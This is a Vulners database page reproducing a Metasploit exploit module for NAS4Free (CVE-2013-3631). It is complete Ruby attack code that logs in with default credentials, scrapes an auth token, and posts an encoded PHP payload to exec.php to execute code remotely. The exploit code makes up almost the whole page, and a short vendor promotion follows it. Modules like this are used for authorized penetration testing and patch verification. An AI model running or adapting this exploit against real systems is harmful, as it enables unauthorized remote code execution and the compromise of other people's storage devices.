Vulners
Lucene search
NAS4Free - Arbitrary Remote Code Execution
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rexml/document'
class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'NAS4Free Arbitrary Remote Code Execution',
'Description' => %q{
NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have
the code executed remotely. This module was successfully tested against NAS4Free version
9.1.0.1.804. Earlier builds are likely to be vulnerable as well.
},
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3631'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
],
'Payload' =>
{
'Space' => 21244,
'DisableNops' => true,
'BadChars' => ''
},
'Targets' =>
[
[ 'Automatic Target', { } ]
],
'Privileged' => true,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DisclosureDate' => 'Oct 30 2013',
'DefaultTarget' => 0))
register_options([
OptString.new('USERNAME', [ true, "Username to authenticate with", "admin"]),
OptString.new('PASSWORD', [ false, "Password to authenticate with", "nas4free"])
], self.class)
end
def exploit
init = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/')
})
sess = init.get_cookies
post = {
'username' => datastore["USERNAME"],
'password' => datastore["PASSWORD"]
}
login = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/login.php'),
'vars_post' => post,
'cookie' => sess
})
if !login or login.code != 302
fail_with("Login failed")
end
exec_resp = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/exec.php'),
'cookie' => sess
})
if !exec_resp or exec_resp.code != 200
fail_with('Error getting auth token from exec.php')
end
authtoken = ''
#The html returned is not well formed, so I can't parse it with rexml
exec_resp.body.each_line do |line|
next if line !~ /authtoken/
authtoken = line
end
doc = REXML::Document.new authtoken
input = doc.root
if !input
fail_with('Error getting auth token')
end
token = input.attributes["value"]
data = Rex::MIME::Message.new
data.add_part('', nil, nil, 'form-data; name="txtCommand"')
data.add_part('', nil, nil, 'form-data; name="txtRecallBuffer"')
data.add_part('', nil, nil, 'form-data; name="dlPath"')
data.add_part('', 'application/octet-stream', nil, 'form-data; name="ulfile"; filename=""')
data.add_part(payload.encoded, nil, nil, 'form-data; name="txtPHPCommand"')
#data.add_part(token, nil, nil, 'form-data; name="authtoken"')
#I need to build the last data part by hand due to a bug in rex
data_post = data.to_s
data_post = data_post[0..data_post.length-data.bound.length-7]
data_post << "\r\n--#{data.bound}"
data_post << "\r\nContent-Disposition: form-data; name=\"authtoken\"\r\n\r\n"
data_post << token
data_post << "\r\n--#{data.bound}--\r\n\r\n"
resp = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/exec.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data_post,
'cookie' => sess
})
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1